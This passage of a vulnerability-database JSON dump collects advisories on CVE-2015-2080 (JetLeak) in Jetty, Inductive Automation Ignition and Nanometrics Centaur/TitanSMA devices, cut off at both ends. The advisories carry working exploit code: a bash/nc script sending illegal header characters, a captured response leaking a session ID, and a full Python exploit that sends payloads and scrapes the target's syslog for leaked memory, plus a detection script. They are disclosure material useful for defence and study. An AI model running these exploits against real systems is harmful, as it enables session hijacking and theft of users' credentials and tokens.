["CVE-2015-2080"], "modified": "2016-02-17T00:00:00", "id": "1337DAY-ID-25382", "href": "https://0day.today/exploit/description/25382", "sourceData": "Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers\r\nVendor: Inductive Automation\r\nProduct web page: http://www.inductiveautomation.com\r\nAffected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)\r\nPlatform: Java\r\n \r\nSummary: Ignition is a powerful industrial application platform with\r\nfully integrated development tools for building SCADA, MES, and 
IIoT\r\nsolutions.\r\n \r\nDesc: Remote unauthenticated atackers are able to read arbitrary data\r\nfrom other HTTP sessions because Ignition uses a vulnerable Jetty server.\r\nWhen the Jetty web server receives a HTTP request, the below code is used\r\nto parse through the HTTP headers and their associated values. The server\r\nbegins by looping through each character for a given header value and checks\r\nthe following:\r\n \r\n- On Line 1164, the server checks if the character is printable ASCII or\r\nnot a valid ASCII character.\r\n- On Line 1172, the server checks if the character is a space or tab.\r\n- On Line 1175, the server checks if the character is a line feed.\r\n- If the character is non-printable ASCII (or less than 0x20), then all\r\nof the checks above are skipped over and the code throws an \u00ebIllegalCharacter\u00ed\r\nexception on line 1186, passing in the illegal character and a shared buffer.\r\n \r\n \r\n---------------------------------------------------------------------------\r\nFile: jetty-http\\src\\main\\java\\org\\eclipse\\jetty\\http\\HttpParser.java\r\n---------------------------------------------------------------------------\r\n920: protected boolean parseHeaders(ByteBuffer buffer)\r\n921: {\r\n[..snip..]\r\n1163: case HEADER_VALUE:\r\n1164: if (ch>HttpTokens.SPACE || ch<0)\r\n1165: {\r\n1166: _string.append((char)(0xff&ch));\r\n1167: _length=_string.length();\r\n1168: setState(State.HEADER_IN_VALUE);\r\n1169: break;\r\n1170: }\r\n1171:\r\n1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)\r\n1173: break;\r\n1174:\r\n1175: if (ch==HttpTokens.LINE_FEED)\r\n1176: {\r\n1177: if (_length > 0)\r\n1178: {\r\n1179: _value=null;\r\n1180: _valueString=(_valueString==null)?takeString():(_valueString+\" \"+takeString());\r\n1181: }\r\n1182: setState(State.HEADER);\r\n1183: break;\r\n1184: }\r\n1185:\r\n1186: throw new IllegalCharacter(ch,buffer);\r\n---------------------------------------------------------------------------\r\n \r\n 
\r\nTested on: Microsoft Windows 7 Professional SP1 (EN)\r\n Microsoft Windows 7 Ultimate SP1 (EN)\r\n Ubuntu Linux 14.04\r\n Mac OS X\r\n HP-UX Itanium\r\n Jetty(9.2.z-SNAPSHOT)\r\n Java/1.8.0_73\r\n Java/1.8.0_66\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2016-5306\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php\r\n \r\nCVE: CVE-2015-2080\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080\r\n \r\nOriginal: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\r\nJetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py\r\nEclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md\r\n https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md\r\n \r\n \r\n14.01.2016\r\n \r\n---\r\n \r\n \r\n#######################\r\n#!/bin/bash\r\n \r\n#RESOURCEPATH=\"/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo\"\r\nRESOURCEPATH=\"/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo\"\r\nBAD=$'\\a'\r\n \r\nfunction normalRequest {\r\necho \"-- Normal Request --\"\r\n \r\nnc localhost 8088 << NORMREQ\r\nPOST $RESOURCEPATH HTTP/1.1\r\nHost: localhost\r\nContent-Type: application/x-www-form-urlencoded;charset=utf-8\r\nConnection: close\r\nContent-Length: 63\r\n \r\nNORMREQ\r\n}\r\n \r\nfunction badCookie {\r\necho \"-- Bad Cookie --\"\r\n \r\nnc localhost 8088 << BADCOOKIE\r\nGET $RESOURCEPATH HTTP/1.1\r\nHost: localhost\r\nCoo${BAD}kie: ${BAD}\r\n \r\nBADCOOKIE\r\n}\r\n \r\nnormalRequest\r\necho \"\"\r\necho \"\"\r\nbadCookie\r\n \r\n#######################\r\n \r\n \r\n \r\nOriginal raw analysis request via proxy using Referer:\r\n------------------------------------------------------\r\n \r\nGET 
/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1\r\nHost: localhost:8088\r\nAccept: application/xml, text/xml, */*; q=0.01\r\nX-Requested-With: XMLHttpRequest\r\nWicket-Ajax: true\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\r\nWicket-Ajax-BaseURL: config/conf.modules?51461\r\nReferer: \\x00\r\n \r\n \r\nResponse leaking part of Cookie session:\r\n----------------------------------------\r\n \r\nHTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\\r\\nReferer: \\x00<<<\\r\\nAccept-Encoding...tion: close\\r\\n\\r\\n>>>SESSIONID=15iwe0g...\\x0fCU\\xFa\\xBf\\xA4j\\x12\\x83\\xCb\\xE61~S\\xD1'\r\nContent-Length: 0\r\nConnection: close\r\nServer: Jetty(9.2.z-SNAPSHOT)\n\n# 0day.today [2018-03-31] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25382"}], "packetstorm": [{"lastseen": "2020-02-18T06:47:25", "description": "", "published": "2020-02-17T00:00:00", "type": "packetstorm", "title": "Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2020-02-17T00:00:00", "id": "PACKETSTORM:156387", "href": "https://packetstormsecurity.com/files/156387/Nanometrics-Centaur-TitanSMA-Unauthenticated-Remote-Memory-Leak.html", "sourceData": "`Title: Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \nAdvisory ID: ZSL-2020-5562 \nType: Local/Remote \nImpact: System Access, DoS, Exposure of System Information, Exposure of Sensitive Information \nRisk: (5/5) \nRelease Date: 15.02.2020 \n \nSummary \n \nThe Centaur digital recorder is a portable geophysical sensing acquisition system that consists of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. 
Its ease of use simplifies high performance geophysical sensing deployments in both remote and networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for infrasound and similar geophysical sensor recording applications requiring sample rates up to 5000 sps. \n \nThe TitanSMA is a strong motion accelerograph designed for high precision observational and structural engineering applications, where scientists and engineers require exceptional dynamic range over a wide frequency band. \nDescription \nAn information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent packet) which can be combined to leak sensitive data which can be used to perform session hijacking and authentication bypass scenarios. \n \nVendor \n \nNanometrics Inc. - https://www.nanometrics.ca \n \nAffected Version \n \nCentaur <= 4.3.23 \nTitanSMA <= 4.2.20 \nTested On \nJetty 9.4.z-SNAPSHOT \n \nVendor Status \n \n[10.02.2020] Vulnerabilities discovered. \n[10.02.2020] Vendor contacted. \n[14.02.2020] No response from the vendor. \n[15.02.2020] Public security advisory released. \n \nPoC \n \n#!/usr/bin/env python3 \n# \n# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \n# \n# \n# Vendor: Nanometrics Inc. 
\n# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# \n# Affected versions: \n# Centaur <= 4.3.23 \n# TitanSMA <= 4.2.20 \n# \n# Summary: \n# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists \n# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. \n# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and \n# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for \n# infrasound and similar geophysical sensor recording applications requiring sample rates up to \n# 5000 sps. \n# \n# Summary: \n# The TitanSMA is a strong motion accelerograph designed for high precision observational and \n# structural engineering applications, where scientists and engineers require exceptional dynamic \n# range over a wide frequency band. \n# \n# Description: \n# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect \n# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) \n# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. \n# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. \n# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP \n# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system \n# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent \n# packet) which can be combined to leak sensitive data which can be used to perform session hijacking \n# and authentication bypass scenarios. 
\n# \n# Tested on: \n# Jetty 9.4.z-SNAPSHOT \n# \n# Vulnerability discovered by: \n# byteGoblin @ zeroscience.mk \n# \n# \n# Advisory ID: ZSL-2020-5562 \n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n# \n# Related CVE: CVE-2015-2080 \n# Related CWE: CWE-532, CWE-538 \n# \n# 10.02.2020 \n# \n \nimport requests \nimport re \nimport sys \n \nclass Goblin: \ndef __init__(self): \nself.host = None \nself.page = \"/zsl\" \nself.syslog = \"/logs/syslog\" \nself.buffer_pad = \"A\" * 70 \nself.buffer = None \nself.payload = \"\\xFF\" \nself.payloads_to_send = 70 # 70 seems to be a good number before we get weird results \nself.body = {} \nself.headers = None \nself.syslog_data = {} \nself.last_line = None \nself.before_last_line = True \n \ndef banner(self): \ngoblin = \"\"\" \nNN \nNkllON \n0;;::k000XN KxllokN \n0;,:,;;;;:ldK Kdccc::oK \nNx,';codddl:::dkdc:c:;lON \nklc:clloooooooc,.':lc;'lX \nx;:ooololccllc:,:ll:,:xX \nKd:cllc'..';:ccclc,.x _ . ___ _ . \nNOoc::c:,'';:ccllc::''k \\ ___ , . _/_ ___ .' \\ __. \\ ___ | ` , __ \nNklc:clccc;.;odoollc:',xN |/ \\ | ` | .' ` | .' \\ |/ \\ | | |' `. \n0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | | \n0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \\__/ `.___, `.___| `._.' `___,' /\\__ / / | \nNc'clc;..,,,:::c:;;;,'..:oddoc;c0 \\___/ \nNl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed// \nXxclkXk;'::,,,''';:::;'''...'',:o0 \nKl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin \nO,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk \nKdcccccdl'';;..'::;;,,,;:::;,'..;:.;K \nd;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. 
- nanometrics.ca \nOddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA \nd...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20 \n0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK \n0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A \n0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n:,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 \nx:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product \nXx:,'':xk:..,''lK Y k;';;';xX \nXOkkko'.....'O d.';;,,:xN \n0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._ \nXOkkkkkON \n\"\"\" \nprint(goblin) \n \ndef generate_payload(self, amount_of_bytes): \nself.payload += \"\\x00\" * amount_of_bytes \nself.headers = {\"Cookie\": self.buffer_pad, \"Referer\": self.payload} \n \ndef read_syslog(self, initial=False): \n# Read syslog remotely and filter out 'HeapByteBuffer' messages. \n# 'initial' is used to make a 'snapshot' of the state before we send payloads... \n# That way we can filter on what we've just sent. \nprint(\"[!] - Grabbing syslog from: {}{}\".format(self.host, self.syslog)) \nbuffer = \"\" \nr = requests.get(self.host + self.syslog) \nif r.status_code == 200: \nprint(\"[!] - We got syslog, it is: {} bytes\".format(len(r.content))) \nsplit = r.text.split(\"\\n\") \nfor line in split: \nif \"HeapByteBuffer\" in line: \nif initial: \nself.last_line = line \nelse: \nif line == self.last_line: \nself.before_last_line = False \nif not self.before_last_line: \nbuffer_addr = re.search(\"\\@\\w+\", line).group(0).strip(\"@\") \ntry: \nleak = re.search(\">>>.+(?=\\.\\.\\.)\", line).group(0).strip(\">>>\") \nbuffer += leak \nexcept Exception as e: \nprint(e) \nif initial: \nreturn self.last_line \nself.buffer = buffer \nelse: # we can't access syslog? \nprint(\"[!!!] - Yoooo... we can't access syslog? 
Make sure you can access it, dawg...\") \nprint(\"[!!!] - The status code we got was: {}\".format(r.status_code)) \nexit(-1) \n \ndef show_output(self): \n# we need to translate '\\r\\n' into actual newlines \nif self.buffer is not None and self.buffer is not \"\": \nself.buffer = self.buffer.replace(\"\\\\n\", \"\\n\") \nself.buffer = self.buffer.replace(\"\\\\r\", \"\\r\") \nself.buffer = self.buffer.replace(\"%2f\", \"/\") \n \nprint(\"[*] BUFFER LENGTH: {}\".format(len(self.buffer))) \nprint(\"=\" * 50) \nprint(\"[*] THIS IS THE LOOT\") \nprint(\"=\" * 50) \nfor num, x in enumerate(self.buffer.split(\"\\n\")): \nprint(\"{}.\\t| \\t{}\".format(num, x)) \n \ndef send_payload(self, amount): \nprint(\"[!] - Sending payloads to target: {}{}\".format(self.host, self.page)) \nif amount > self.payloads_to_send or amount < 0: \namount = self.payloads_to_send \nfor num, x in enumerate(range(0, amount)): \nif num % 10 == 0: \nprint(\"[!] - [{}/{}] payloads sent...\".format(num, amount)) \ntry: \nself.generate_payload(17) \nr = requests.post(self.host + self.page, data=self.body, headers=self.headers) \nexcept Exception as e: \nprint(e) \nprint(\"[!] 
- [{}/{}] payloads sent...\".format(amount, amount)) \n \ndef parse_sys_args(self): \nif len(sys.argv) >= 2: \nself.host = sys.argv[1] \nif not \"http\" in self.host: \nself.host = \"http://{}\".format(self.host) \nif len(sys.argv) == 3: \n# amount of packets to send \nself.payloads_to_send = sys.argv[2] \nelse: \nself.print_help() \n \ndef print_help(self): \nprint(\"Usage: {} <ip_addr[:port]> [amount of payloads to send]\".format(sys.argv[0])) \nprint(\"Example: centaur3.py 123.456.789.0:8080 200\") \nprint(\"\\tThis will send 200 payloads to the aforementioned host\") \nprint(\"\\tThe [port] and [amount of payloads] are optional\") \nexit(-1) \n \ndef main(self): \nself.parse_sys_args() \nself.banner() \nll = self.read_syslog(initial=True) \nself.send_payload(70) \nself.read_syslog() \nself.show_output() \n \nif __name__ == '__main__': \nGoblin().main() \n \nCredits \n \nVulnerability discovered by byteGoblin - <bytegoblin@zeroscience.mk> \n \nReferences \n \n[1] https://nvd.nist.gov/vuln/detail/CVE-2015-2080 \n[2] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php \n \nChangelog \n \n[15.02.2020] - Initial release \n \nContact \n \nZero Science Lab \n \nWeb: http://www.zeroscience.mk \ne-mail: lab@zeroscience.mk \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/156387/ZSL-2020-5562.txt"}, {"lastseen": "2016-12-05T22:17:20", "description": "", "published": "2015-02-27T00:00:00", "type": "packetstorm", "title": "Jetty 9.2.8 Shared Buffer Leakage", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2015-02-27T00:00:00", "id": "PACKETSTORM:130567", "href": "https://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html", "sourceData": "`GDS LABS ALERT: CVE-2015-2080 \nJetLeak Vulnerability Remote Leakage Of Shared Buffers In Jetty Web Server \n \nSYNOPSIS \n======== \nGotham Digital Science discovered a critical information 
leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests and responses submitted to the server by other users. \n \nThe vulnerability was made public by the Jetty development team on the 24th of February 2015 and included proof-of-concept exploit code. As a result, GDS Labs recommends upgrading Jetty web server to a version patched against this vulnerability as soon as possible. \n \n \nIMPACT \n====== \nUsing a vulnerable version of the Jetty web server can lead to the compromise of sensitive data including data passed within headers (e.g. cookies, authentication tokens, etc.), as well as data passed in the POST body (e.g. usernames, passwords, authentication tokens, CSRF tokens, PII, etc.) of requests and responses handled by the web server. \n \nThe root cause of this vulnerability can be traced to exception handling code that returns approximately 16 bytes of data from a shared buffer when illegal characters are submitted in header values to the server. An attacker can exploit this behavior by submitting carefully crafted requests containing variable length strings of illegal characters to trigger the exception and offset into the shared buffer. Since the shared buffer contains user submitted data from previous requests, the Jetty server will return specific data chunks from a previous exchange depending on the attacker's payload offset. \n \n \nARE YOU VULNERABLE? \n=================== \nThis vulnerability affects versions 9.2.3 to 9.2.8. GDS also found that beta releases (including the beta releases of 9.3.x) are vulnerable. \n \nGDS have created a simple python script that can be used to determine if a Jetty HTTP server is vulnerable. 
The script code can be downloaded from the GDS Github repository below: \n \n- https://github.com/GDSSecurity/Jetleak-Testing-Script \n \nIf running one of the vulnerable Jetty web server versions, Jetty recommends that you upgrade to version 9.2.9.v20150224 immediately. Organizations should also be aware that Jetty might be bundled within third party products. GDS recommends referring to the Jetty Powered website (http://eclipse.org/jetty/powered/) for a non-exhaustive list of products that utilize Jetty. Due to Jetty being a fairly lightweight HTTP server, it is also commonly used by a variety of embedded systems. Organizations should contact any vendors that may be running a Jetty web server in order to determine if their products are vulnerable and when any patches to resolve this vulnerability will be made available. \n \nWe have encountered cases where development teams use Jetty as a light-weight replacement for app servers such as Tomcat for internal testing. Organizations should consider notifying their development teams about the vulnerability and require teams to upgrade any vulnerable versions of Jetty. 
\n \nThe latest release of the Jetty HTTP server is available for download at the following locations: \n \n- Maven - http://central.maven.org/ \n- Jetty Downloads - http://download.eclipse.org/jetty \n \n \nREFERENCES \n========== \nA thorough technical analysis of the vulnerability is available on the GDS blog at: \n \nhttp://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html \n \nJetty Vulnerability Announcement: \n \nhttp://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html \n \nJetty Vulnerability Advisory: \n \nhttps://github.com/eclipse/jetty.project/blob/master/advisories/2015-02-24-httpparser-error-buffer-bleed.md \n \n \nDISCLOSURE TIMELINE \n=================== \nFeb 19, 2015 - Vulnerability report sent to security@eclipse.org using SendSafely \n \nFeb 23, 2015 - Jetty team downloads the vulnerability report \n \nFeb 24, 2015 - Jetty team releases HTTP Server v9.2.9.v20150224 with bug fix and publicly discloses vulnerability with exploit code \n \nFeb 25, 2015 - GDS publicly discloses vulnerability \n \n \nGDS commends the Jetty development team on their timely response and swift remediation. It should be noted that the decision to publicly disclose the vulnerability was made by the Jetty development team, independent of GDS. GDS' blog post and vulnerability disclosure were published after it was discovered that Jetty had publicly disclosed the vulnerability. \n \n \nCREDITS \n======= \nStephen Komal from Gotham Digital Science for discovering the bug. \n \n \nAbout GDS Labs \n============== \n \nSecurity Research & Development is a core focus and competitive advantage for GDS. 
The GDS Labs team has the following primary directives: \n \n- Assessing cutting-edge technology stacks \n \n- Improving delivery efficiency through custom tool development \n \n- Finding & responsibly disclosing vulnerabilities in high value targets \n \n- Assessing the impact to our clients of high risk, publicly disclosed vulnerabilities \n \nThe GDS Labs R&D team performs security research, with areas of current focus including mobile application security, embedded systems, and cryptography. GDS also participates in many security related organizations and groups. GDS Labs is a value added service that our clients benefit from on virtually every engagement that we perform. \n \n \nAbout Gotham Digital Science \n======================= \n \nGotham Digital Science (GDS) is a specialist security consulting company focused on helping our clients find, fix, and prevent security bugs in mission critical network infrastructure, web-based software applications, mobile apps and embedded systems. GDS is also committed to contributing to the security and developer communities through sharing knowledge and resources such as blog posts, security tool releases, vulnerability disclosures, sponsoring and presenting at various industry conferences. \n \nFor more information on GDS, please contact info@gdssecurity.com or visit http://www.gdssecurity.com. \n \n \n----------------------------------- \njetleak_tester.py proof of concept: \n \nimport httplib, urllib, ssl, string, sys, getopt \nfrom urlparse import urlparse \n \n''' \n \nAuthor: Gotham Digital Science \n \nPurpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether \ntheir Jetty web server versions are vulnerable to JetLeak. Currently, this script does \nnot handle sites with invalid SSL certs. This will be fixed in a future iteration. 
\n \n''' \n \nif len(sys.argv) < 3: \nprint(\"Usage: jetleak.py [url] [port]\") \nsys.exit(1) \n \nurl = urlparse(sys.argv[1]) \nif url.scheme == '' and url.netloc == '': \nprint(\"Error: Invalid URL Entered.\") \nsys.exit(1) \n \nport = sys.argv[2] \n \nconn = None \n \nif url.scheme == \"https\": \nconn = httplib.HTTPSConnection(url.netloc + \":\" + port) \nelif url.scheme == \"http\": \nconn = httplib.HTTPConnection(url.netloc + \":\" + port) \nelse: \nprint(\"Error: Only 'http' or 'https' URL Schemes Supported\") \nsys.exit(1) \n \nx = \"\\x00\" \nheaders = {\"Referer\": x} \nconn.request(\"POST\", \"/\", \"\", headers) \nr1 = conn.getresponse() \n \nif (r1.status == 400 and (\"Illegal character 0x0 in state\" in r1.reason)): \nprint(\"\\r\\nThis version of Jetty is VULNERABLE to JetLeak!\") \nelse: \nprint(\"\\r\\nThis version of Jetty is NOT vulnerable to JetLeak.\") \n`\n", "cvss": {"score": 3.9, "vector": "AV:NETWORK/AC:LOW/Au:UNKNOWN/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130567/jetty-disclose.txt"}, {"lastseen": "2016-12-05T22:14:17", "description": "", "published": "2016-02-17T00:00:00", "type": "packetstorm", "title": "Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2016-02-17T00:00:00", "id": "PACKETSTORM:135804", "href": "https://packetstormsecurity.com/files/135804/Inductive-Automation-Ignition-7.8.1-Remote-Leakage-Of-Shared-Buffers.html", "sourceData": "` \nInductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers \n \n \nVendor: Inductive Automation \nProduct web page: http://www.inductiveautomation.com \nAffected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414) \nPlatform: Java \n \nSummary: Ignition is a powerful industrial application platform with \nfully integrated development tools for building SCADA, MES, and IIoT \nsolutions. 
\n \nDesc: Remote unauthenticated attackers are able to read arbitrary data \nfrom other HTTP sessions because Ignition uses a vulnerable Jetty server. \nWhen the Jetty web server receives an HTTP request, the below code is used \nto parse through the HTTP headers and their associated values. The server \nbegins by looping through each character for a given header value and checks \nthe following: \n \n- On Line 1164, the server checks if the character is printable ASCII or \nnot a valid ASCII character. \n- On Line 1172, the server checks if the character is a space or tab. \n- On Line 1175, the server checks if the character is a line feed. \n- If the character is non-printable ASCII (or less than 0x20), then all \nof the checks above are skipped over and the code throws an 'IllegalCharacter' \nexception on line 1186, passing in the illegal character and a shared buffer. \n \n \n--------------------------------------------------------------------------- \nFile: jetty-http\\src\\main\\java\\org\\eclipse\\jetty\\http\\HttpParser.java \n--------------------------------------------------------------------------- \n920: protected boolean parseHeaders(ByteBuffer buffer) \n921: { \n[..snip..] 
\n1163: case HEADER_VALUE: \n1164: if (ch>HttpTokens.SPACE || ch<0) \n1165: { \n1166: _string.append((char)(0xff&ch)); \n1167: _length=_string.length(); \n1168: setState(State.HEADER_IN_VALUE); \n1169: break; \n1170: } \n1171: \n1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB) \n1173: break; \n1174: \n1175: if (ch==HttpTokens.LINE_FEED) \n1176: { \n1177: if (_length > 0) \n1178: { \n1179: _value=null; \n1180: _valueString=(_valueString==null)?takeString():(_valueString+\" \"+takeString()); \n1181: } \n1182: setState(State.HEADER); \n1183: break; \n1184: } \n1185: \n1186: throw new IllegalCharacter(ch,buffer); \n--------------------------------------------------------------------------- \n \n \nTested on: Microsoft Windows 7 Professional SP1 (EN) \nMicrosoft Windows 7 Ultimate SP1 (EN) \nUbuntu Linux 14.04 \nMac OS X \nHP-UX Itanium \nJetty(9.2.z-SNAPSHOT) \nJava/1.8.0_73 \nJava/1.8.0_66 \n \n \nVulnerability discovered by Gjoko 'LiquidWorm' Krstic \n@zeroscience \n \n \nAdvisory ID: ZSL-2016-5306 \nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php \n \nCVE: CVE-2015-2080 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080 \n \nOriginal: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html \nJetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py \nEclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md \nhttps://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md \n \n \n14.01.2016 \n \n--- \n \n \n####################### \n#!/bin/bash \n \n#RESOURCEPATH=\"/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo\" \nRESOURCEPATH=\"/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo\" \nBAD=$'\\a' \n \nfunction normalRequest { \necho \"-- Normal Request --\" \n \nnc 
localhost 8088 << NORMREQ \nPOST $RESOURCEPATH HTTP/1.1 \nHost: localhost \nContent-Type: application/x-www-form-urlencoded;charset=utf-8 \nConnection: close \nContent-Length: 63 \n \nNORMREQ \n} \n \nfunction badCookie { \necho \"-- Bad Cookie --\" \n \nnc localhost 8088 << BADCOOKIE \nGET $RESOURCEPATH HTTP/1.1 \nHost: localhost \nCoo${BAD}kie: ${BAD} \n \nBADCOOKIE \n} \n \nnormalRequest \necho \"\" \necho \"\" \nbadCookie \n \n####################### \n \n \n \nOriginal raw analysis request via proxy using Referer: \n------------------------------------------------------ \n \nGET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1 \nHost: localhost:8088 \nAccept: application/xml, text/xml, */*; q=0.01 \nX-Requested-With: XMLHttpRequest \nWicket-Ajax: true \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 \nWicket-Ajax-BaseURL: config/conf.modules?51461 \nReferer: \\x00 \n \n \nResponse leaking part of Cookie session: \n---------------------------------------- \n \nHTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\\r\\nReferer: \\x00<<<\\r\\nAccept-Encoding...tion: close\\r\\n\\r\\n>>>SESSIONID=15iwe0g...\\x0fCU\\xFa\\xBf\\xA4j\\x12\\x83\\xCb\\xE61~S\\xD1' \nContent-Length: 0 \nConnection: close \nServer: Jetty(9.2.z-SNAPSHOT) \n \n`\n", "cvss": {"score": 3.9, "vector": "AV:NETWORK/AC:LOW/Au:UNKNOWN/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135804/ZSL-2016-5306.txt"}, {"lastseen": "2020-02-20T07:06:03", "description": "", "published": "2020-02-19T00:00:00", "type": "packetstorm", "title": "Nanometrics Centaur 4.3.23 Memory Leak", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2020-02-19T00:00:00", "id": "PACKETSTORM:156414", "href": "https://packetstormsecurity.com/files/156414/Nanometrics-Centaur-4.3.23-Memory-Leak.html", "sourceData": "`# Exploit 
